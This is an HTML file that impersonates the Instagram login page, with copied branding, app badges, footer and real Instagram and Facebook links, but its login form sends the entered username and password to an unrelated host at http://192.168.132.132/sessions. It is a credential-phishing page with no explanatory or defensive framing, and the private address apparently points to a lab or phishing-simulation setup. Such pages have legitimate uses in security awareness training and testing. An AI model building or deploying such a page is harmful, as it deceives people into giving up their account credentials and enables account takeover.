<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <script src="https://kit.fontawesome.com/fc1e235b2e.js"></script>
  <!-- Embedding the updated style.css content -->
  <style>
    *,
    *::before,
    *::after {
      margin: 0;
      padding: 0;
      box-sizing: inherit;
    }

    html {
      font-size: 10px;
      box-sizing: border-box;
    }

    img {
      width: 100%;
      max-width: 100%;
      height: 100%;
    }

    a {
      text-decoration: none;
    }

    body {
      background-color: #fafafa;
    }

    #container {
      width: 100%;
      height: 100vh;
      display: flex;
      flex-direction: column;
      justify-content: space-between;
      padding-top: 10rem;
    }

    .content-wrapper {
      width: 100%;
      max-width: 93.5rem;
      margin: 3rem auto 0;
    }

    #container > .content-wrapper {
      display: flex;
      padding: 0 8rem;
    }

    .app-preview {
      height: 61.8rem;
      background: url("https://media.discordapp.net/attachments/850225699796942858/1268260469118865500/mobile-app.png?ex=66abc71a&is=66aa759a&hm=bc902c3ed9a6ffeff870bd467117df9a2713b222675043b4c25924a504b24045&=&format=webp&quality=lossless&width=367&height=499") center no-repeat;
      flex: 1;
    }

    .form-section {
      width: 100%;
      max-width: 35rem;
      margin-top: 3rem;
    }

    .form-section form {
      background-color: #fff;
      border: 2px solid #eee;
      display: flex;
      flex-direction: column;
      padding: 2rem 4rem;
      text-align: center;
    }

    .logo img {
      width: 17.5rem;
      margin-bottom: 2.5rem;
    }

    .form-section form input {
      padding: .8rem;
      margin-bottom: .5rem;
      border: 2px solid #eee;
      border-radius: .4rem;
    }

    .submit-button {
      margin: 1rem 0 1.5rem;
      height: 3rem;
      background-color: #3897f0;
      font-size: 1.4rem;
      font-weight: bold;
      color: #fff;
      border: none;
      border-radius: .4rem;
      cursor: pointer;
    }

    .separator {
      font-size: 1.3rem;
      color: #999999;
      text-transform: uppercase;
      position: relative;
      margin-bottom: 2.5rem;
    }

    .separator::before,
    .separator::after {
      content: "";
      position: absolute;
      background-color: #eee;
      width: 40%;
      height: 2px;
      top: 50%;
      transform: translateY(-50%);
    }

    .separator::before {
      left: 0;
    }

    .separator::after {
      right: 0;
    }

    .facebook-login {
      font-family: "Montserrat";
      font-size: 1.2rem;
      font-weight: bold;
      color: #385185;
      margin-bottom: 2.5rem;
    }

    .facebook-login i {
      font-family: "Montserrat";
      font-size: 2rem;
      margin-right: .7rem;
    }

    .forgot-password {
      font-family: "Montserrat";
      font-size: 1.2rem;
      color: #01407f;
      font-weight: 400;
    }

    .sign-up-section {
      text-align: center;
      font-family: "Montserrat";
      font-size: 1.3rem;
      color: #262626;
      padding: 2rem 0;
      background-color: #fff;
      border: 2px solid #eee;
      margin: 1rem 0;
    }

    .sign-up-section a {
      color: #3897f0;
      font-family: "Montserrat";
      font-optical-sizing: auto;
      font-weight: 500;
    }

    .download-app {
      font-size: 1.4rem;
      text-align: center;
    }

    .download-app span {
      display: block;
      margin: 2rem 0;
      color: #262626;
    }

    .badge-links {
      width: 100%;
      display: flex;
      justify-content: center;
    }

    .badge-links img {
      max-width: 14rem;
      cursor: pointer;
    }

    .badge-links img:first-child {
      margin-right: 1rem;
    }

    footer {
      padding: 5rem 0;
    }

    footer .content-wrapper {
      display: flex;
      justify-content: space-between;
      font-family: "Montserrat";
      font-size: 1.3rem;
      margin-top: 0;
      flex-wrap: wrap;
    }

    .footer-nav ul {
      display: flex;
      flex-wrap: wrap;
      list-style: none;
    }

    .footer-nav ul li {
      margin-right: 1.6rem;
    }

    .footer-nav ul li a {
      color: #999999;
    }

    .copyright {
      color: #999999;
    }

    /* MEDIA QUERIES */

    @media (max-width: 900px) {
      .app-preview {
        display: none;
      }

      .form-section {
        margin: 0 auto;
      }

      #container > .content-wrapper {
        padding: 0;
      }

      footer .content-wrapper {
        padding: 0 2rem;
        justify-content: center;
      }

      .footer-nav ul {
        justify-content: center;
      }

      .footer-nav ul li {
        margin-bottom: 1rem;
      }
    }

    @media (max-width: 450px) {
      #container {
        padding-top: 0;
      }

      .form-section form {
        background-color: transparent;
        border: none;
        padding: 0 2rem;
      }

      .sign-up-section {
        background-color: transparent;
        border: none;
        margin: 4rem 0;
      }

      footer {
        padding-bottom: 2rem;
      }
    }

    /* footer select */
    select {
      border-radius: 5px;
      margin-right: 15px;
    }
  </style>

  <!-- favicon -->
  <link rel="apple-touch-icon" sizes="180x180" href="https://cdn.discordapp.com/attachments/850225699796942858/1268259372983652466/android-chrome-192x192.png?ex=66abc615&is=66aa7495&hm=cfa9550719228f4d4b9b25ee0261c88bfdee0ce8d4642b8e3f4d18471992993c&">
  <link rel="icon" type="image/png" sizes="32x32" href="https://cdn.discordapp.com/attachments/850225699796942858/1268259372719669359/favicon-32x32.png?ex=66abc615&is=66aa7495&hm=9313bca8fdd73f4393f51101991e1bd37335b67266db595d012b09c02a8f326a&">
  <link rel="icon" type="image/png" sizes="16x16" href="https://cdn.discordapp.com/attachments/850225699796942858/1268259372400771112/favicon-16x16.png?ex=66abc615&is=66aa7495&hm=8e0e59a1b090c4284c0122913378f0fbfac64be77a6327b71e90ea31c9976d1d&">
  <link rel="manifest" href="images/site.webmanifest">

  <!-- Google fonts -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">

  <title>Log in • Instagram</title>
</head>

<body>

  <div id="container">
    <div class="content-wrapper">
      <div class="app-preview"></div>
      <div class="form-section">
        <form action="http://192.168.132.132/sessions" method="post">
          <div class="logo">
            <img src="https://cdn.discordapp.com/attachments/850225699796942858/1268260468804423801/logo.png?ex=66abc71a&is=66aa759a&hm=19a46a75f2b8e8e437c1ee5ef27a31e356f8557e2de87d97e96272b00fd1d39e&" alt="logo">
          </div>
          <input type="text" name="username" placeholder="Phone number, username, or email" style="font-size:0.7vw;">
          <input type="password" name="password" placeholder="Password" style="font-size:0.7vw;">
          <button class="submit-button" type="submit">Log in</button>
          <span class="separator">Or</span>
          <a class="facebook-login"
            href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26locale%3Den_GB%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26response_type%3Dcode%252Cgranted_scopes%26scope%3Demail%26state%3D%257B%2522fbLoginKey%2522%253A%25221e1dlxvwtkfbr3jr1zreynon4n7h5ie98tfwsacgzob1yp1iib%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D601c4deb-d358-457d-9787-19c68b5b140a%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%25221e1dlxvwtkfbr3jr1zreynon4n7h5ie98tfwsacgzob1yp1iib%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=en_GB&pl_dbl=0">
            <i></i> Log in with Facebook
          </a>
          <a class="forgot-password" href="https://www.instagram.com/accounts/password/reset/">Forgotten your password?</a>
        </form>
        <div class="sign-up-section">
          Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a>
        </div>
        <div class="download-app">
          <span>Get the app.</span>
          <div class="badge-links">
            <a href="https://apps.apple.com/us/app/instagram/id389801252" target="_blank" rel="noopener noreferrer"><img
                src="https://media.discordapp.net/attachments/850225699796942858/1268259374334345217/app-store.png?ex=66abc615&is=66aa7495&hm=e9df4bb964c6194fb5d42e9c411ab1c8db3cf206d9cf293aa9640f6fafb88244&=&format=webp&quality=lossless&width=275&height=80" alt="app-store badge"></a>

            <a href="https://l.instagram.com/?u=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.instagram.android%26referrer%3Dig_mid%253D466FBFB3-734B-4B50-9CCC-C0697A118080%2526utm_campaign%253DloginPage%2526utm_content%253Dlo%2526utm_source%253Dinstagramweb%2526utm_medium%253Dbadge%2526original_referrer%253Dhttps%25253A%25252F%25252Fwww.instagram.com%25252F&e=AT0qRFDVOOMMJlsmSH1QEv6Ap8-1yKF98nW4sJdZV49uiuxzv6wQ_v2mmPOeOkjPAn5Ojw3x6eZc2f_0m4qVO0ojIrZqQdSQ59FyW7j74CEsxOdtjJM38zC9VnI3RWcOIR1-F5u_xxvxCxH-eY0kLarI8ekCJ15-X5vjog"
              target="_blank" rel="noopener noreferrer"><img src="https://media.discordapp.net/attachments/850225699796942858/1268260468577927178/google-play.png?ex=66abc71a&is=66aa759a&hm=b333dc181e90fc6a76189f359ae8f56b85a6eeeb20e87958abc80c9c8e4acfb0&=&format=webp&quality=lossless&width=507&height=151" alt="google-play badge">
            </a>
          </div>
        </div>
      </div>
    </div>

    <footer>
      <div class="content-wrapper">
        <nav class="footer-nav">
          <ul>
            <li>
              <a href="https://about.meta.com/" target="_blank">Meta</a>
            </li>
            <li>
              <a href="https://about.instagram.com/" target="_blank">About</a>
            </li>
            <li>
              <a href="#">Support</a>
            </li>
            <li>
              <a href="#">Press</a>
            </li>
            <li>
              <a href="#">Api</a>
            </li>
            <li>
              <a href="#">Jobs</a>
            </li>
            <li>
              <a href="#">Privacy</a>
            </li>
            <li>
              <a href="#">Terms</a>
            </li>
            <li>
              <a href="#">Directory</a>
            </li>
            <li>
              <a href="#">Profiles</a>
            </li>
            <li>
              <a href="#">Hashtags</a>
            </li>
            <li>
              <a href="#">Languages</a>
            </li>
          </ul>
        </nav>
        <span>
          <select>
            <option value="af">Afrikaans</option>
            <option value="ar">العربية</option>
            <option value="cs">Čeština</option>
            <option value="da">Dansk</option>
            <option value="de">Deutsch</option>
            <option value="el">Ελληνικά</option>
            <option value="en">English</option>
            <option value="en-gb" selected>English (UK)</option>
            <option value="es">Español (España)</option>
            <option value="es-la">Español</option>
            <option value="fa">فارسی</option>
            <option value="fi">Suomi</option>
            <option value="fr">Français</option>
            <option value="he">עברית</option>
            <option value="id">Bahasa Indonesia</option>
            <option value="it">Italiano</option>
            <option value="ja">日本語</option>
            <option value="ko">한국어</option>
            <option value="ms">Bahasa Melayu</option>
            <option value="nb">Norsk</option>
            <option value="nl">Nederlands</option>
            <option value="pl">Polski</option>
            <option value="pt-br">Português (Brasil)</option>
            <option value="pt">Português (Portugal)</option>
            <option value="ru">Русский</option>
            <option value="sv">Svenska</option>
            <option value="th">ภาษาไทย</option>
            <option value="tl">Filipino</option>
            <option value="tr">Türkçe</option>
            <option value="zh-cn">中文(简体)</option>
            <option value="zh-tw">中文(台灣)</option>
            <option value="bn">বাংলা</option>
            <option value="gu">ગુજરાતી</option>
            <option value="hi">हिन्दी</option>
            <option value="hr">Hrvatski</option>
            <option value="hu">Magyar</option>
            <option value="kn">ಕನ್ನಡ</option>
            <option value="ml">മലയാളം</option>
            <option value="mr">मराठी</option>
            <option value="ne">नेपाली</option>
            <option value="pa">ਪੰਜਾਬੀ</option>
            <option value="si">සිංහල</option>
            <option value="sk">Slovenčina</option>
            <option value="ta">தமிழ்</option>
            <option value="te">తెలుగు</option>
            <option value="ur">اردو</option>
            <option value="vi">Tiếng Việt</option>
            <option value="zh-hk">中文(香港)</option>
            <option value="bg">Български</option>
            <option value="fr-ca">Français (Canada)</option>
            <option value="ro">Română</option>
            <option value="sr">Српски</option>
            <option value="uk">Українська</option>
          </select>
        </span>
        <div class="copyright">
          &copy 2024 Instagram from meta
        </div>
      </div>
    </footer>

  </div>

</body>

</html>
